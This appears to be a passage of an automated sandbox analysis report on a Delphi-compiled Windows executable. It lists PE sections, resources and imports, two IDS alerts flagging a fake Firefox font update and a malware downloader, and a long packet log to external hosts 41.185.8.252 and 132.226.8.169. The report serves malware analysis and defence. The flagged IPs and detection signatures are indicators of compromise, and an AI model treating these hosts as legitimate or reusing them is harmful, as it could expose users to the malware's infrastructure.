| .rdata | 0x138000 | 0x18 | 0x200 | 4b2adcf7cfdd802a95428d44a20a5f89 | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x139000 | 0x6cd8 | 0x6e00 | 0278e681effa7fbcc52ec0b51ce696ab | False | 0.6368607954545454 | data | 6.6913122302764805 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x140000 | 0xd4654 | 0xd4800 | 523e395b34b9ab2a31c6f4a19f889cf4 | False | 0.6411638327205882 | data | 7.46297786535702 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0x140bd0 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635 |
| RT_CURSOR | 0x140d04 | 0x134 | data | English | United States | 0.4642857142857143 |
| RT_CURSOR | 0x140e38 | 0x134 | data | English | United States | 0.4805194805194805 |
| RT_CURSOR | 0x140f6c | 0x134 | data | English | United States | 0.38311688311688313 |
| RT_CURSOR | 0x1410a0 | 0x134 | data | English | United States | 0.36038961038961037 |
| RT_CURSOR | 0x1411d4 | 0x134 | data | English | United States | 0.4090909090909091 |
| RT_CURSOR | 0x141308 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468 |
| RT_BITMAP | 0x14143c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066 |
| RT_BITMAP | 0x14160c | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125 |
| RT_BITMAP | 0x1417f0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066 |
| RT_BITMAP | 0x1419c0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414 |
| RT_BITMAP | 0x141b90 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414 |
| RT_BITMAP | 0x141d60 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931 |
| RT_BITMAP | 0x141f30 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793 |
| RT_BITMAP | 0x142100 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105 |
| RT_BITMAP | 0x1422d0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896 |
| RT_BITMAP | 0x1424a0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105 |
| RT_BITMAP | 0x142670 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414 |
| RT_ICON | 0x142758 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m | | | 0.4104609929078014 |
| RT_ICON | 0x142bc0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m | | | 0.2815573770491803 |
| RT_ICON | 0x143548 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m | | | 0.20567542213883677 |
| RT_ICON | 0x1445f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m | | | 0.14844398340248963 |
| RT_ICON | 0x146b98 | 0x15ef | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9403383793410508 |
| RT_DIALOG | 0x148188 | 0x52 | data | | | 0.7682926829268293 |
| RT_DIALOG | 0x1481dc | 0x52 | data | | | 0.7560975609756098 |
| RT_STRING | 0x148230 | 0x29c | data | | | 0.4505988023952096 |
| RT_STRING | 0x1484cc | 0x2b4 | data | | | 0.476878612716763 |
| RT_STRING | 0x148780 | 0xb4 | data | | | 0.6888888888888889 |
| RT_STRING | 0x148834 | 0xe8 | data | | | 0.6422413793103449 |
| RT_STRING | 0x14891c | 0x2a8 | data | | | 0.4764705882352941 |
| RT_STRING | 0x148bc4 | 0x3e8 | data | | | 0.382 |
| RT_STRING | 0x148fac | 0x370 | data | | | 0.4022727272727273 |
| RT_STRING | 0x14931c | 0x3cc | data | | | 0.33539094650205764 |
| RT_STRING | 0x1496e8 | 0x214 | data | | | 0.49624060150375937 |
| RT_STRING | 0x1498fc | 0xcc | data | | | 0.6274509803921569 |
| RT_STRING | 0x1499c8 | 0x194 | data | | | 0.5643564356435643 |
| RT_STRING | 0x149b5c | 0x3c4 | data | | | 0.3288381742738589 |
| RT_STRING | 0x149f20 | 0x338 | data | | | 0.42961165048543687 |
| RT_STRING | 0x14a258 | 0x294 | data | | | 0.42424242424242425 |
| RT_RCDATA | 0x14a4ec | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0x14a4fc | 0x368 | data | | | 0.7029816513761468 |
| RT_RCDATA | 0x14a864 | 0xc9301 | GIF image data, version 89a, 384 x 288 | English | United States | 0.6578109736489234 |
| RT_RCDATA | 0x213b68 | 0x188 | Delphi compiled form 'TMainForm' | | | 0.7168367346938775 |
| RT_GROUP_CURSOR | 0x213cf0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0x213d04 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0x213d18 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x213d2c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x213d40 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x213d54 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x213d68 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_ICON | 0x213d7c | 0x4c | data | | | 0.8289473684210527 |
| RT_VERSION | 0x213dc8 | 0x88c | data | English | United States | 0.2180073126142596 |
| DLL | Import |
|---|---|
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA |
| kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle |
| kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA |
| user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout |
| gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt |
| version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
| kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey |
| oleaut32.dll | CreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString |
| ole32.dll | CoCreateInstance, CoUninitialize, CoInitialize |
| kernel32.dll | Sleep |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit |
| comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create |
| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-03T02:47:08.540332+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.20 | 49747 | 41.185.8.252 | 443 | TCP |
| 2025-01-03T02:47:14.889412+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.20 | 49748 | 132.226.8.169 | 80 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 3, 2025 02:47:07.777347088 CET | 49746 | 443 | 192.168.11.20 | 41.185.8.252 |
| Jan 3, 2025 02:47:07.777426004 CET | 443 | 49746 | 41.185.8.252 | 192.168.11.20 |
| Jan 3, 2025 02:47:07.777565956 CET | 49746 | 443 | 192.168.11.20 | 41.185.8.252 |
| Jan 3, 2025 02:47:07.778639078 CET | 49746 | 443 | 192.168.11.20 | 41.185.8.252 |
| Jan 3, 2025 02:47:07.778702974 CET | 443 | 49746 | 41.185.8.252 | 192.168.11.20 |
| Jan 3, 2025 02:47:07.778846979 CET | 49746 | 443 | 192.168.11.20 | 41.185.8.252 |
| Jan 3, 2025 02:47:07.798082113 CET | 49747 | 443 | 192.168.11.20 | 41.185.8.252 |
| Jan 3, 2025 02:47:07.798106909 CET | 443 | 49747 | 41.185.8.252 | 192.168.11.20 |
| Jan 3, 2025 02:47:07.798398018 CET | 49747 | 443 | 192.168.11.20 | 41.185.8.252 |
| Jan 3, 2025 02:47:07.800714970 CET | 49747 | 443 | 192.168.11.20 | 41.185.8.252 |
| Jan 3, 2025 02:47:07.800734043 CET | 443 | 49747 | 41.185.8.252 | 192.168.11.20 |
| Jan 3, 2025 02:47:08.540020943 CET | 443 | 49747 | 41.185.8.252 | 192.168.11.20 |
                                                                                                                                      Jan 3, 2025 02:47:08.540332079 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:08.544358969 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:08.544374943 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:08.544713020 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:08.572139025 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:08.614212990 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.257642984 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.257666111 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.257829905 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.257846117 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.306694031 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.617723942 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.617732048 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.618010044 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.618062019 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.621902943 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.621911049 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.622133017 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.622278929 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.622648001 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.622656107 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.622920990 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.660787106 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.660793066 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.661128998 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.982264042 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.982269049 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.982533932 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.983028889 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.983221054 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.983407021 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.983767033 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.984002113 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.984427929 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.984577894 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.984664917 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.985135078 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:09.985300064 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:09.985394955 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.021523952 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.021655083 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.021771908 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.063355923 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.063539982 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.063601971 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.340310097 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.340316057 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.340537071 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.340584993 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.343802929 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.344069004 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.344125986 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.345248938 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.345437050 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.345494986 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.346028090 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.346223116 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.346343040 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.346666098 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.346920967 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.347038984 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.347484112 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.347749949 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.348182917 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.348414898 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.348516941 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.348882914 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.349127054 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.349709988 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.350091934 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.350429058 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.350610018 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.350802898 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.351160049 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.351341009 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.351511002 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.382901907 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.383166075 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.383819103 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.384022951 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.384139061 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.424412966 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.424678087 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.424695015 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.703401089 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.703404903 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.703754902 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.704118013 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.704317093 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.704551935 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.704786062 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.705070019 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.705487013 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.705789089 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.706558943 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.706845045 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.707453012 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.707787991 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.710927963 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.711117983 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.711267948 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.711615086 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.711811066 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.711874962 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.712379932 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.712548971 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.712599039 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.713087082 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.713355064 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.713852882 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.714106083 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.714493036 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.714679956 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.714930058 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.715315104 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.715542078 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.716062069 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.716252089 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.716315985 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.716715097 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.716895103 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.716895103 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.717149973 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.717436075 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.717617989 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.717617989 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.717736959 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.718240023 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.718420029 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.718481064 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.718986034 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.719177008 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.719177008 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.719237089 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.719630957 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.719943047 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.720455885 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:10.720645905 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:10.720861912 CET49747443192.168.11.2041.185.8.252
Jan 3, 2025 02:47:10.721205950 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:10.721388102 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.721388102 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.721499920 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.743352890 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:10.743571997 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.743611097 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.744103909 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:10.744265079 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.744316101 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.744374990 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.744863987 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:10.745014906 CET  49747  443    192.168.11.20  41.185.8.252
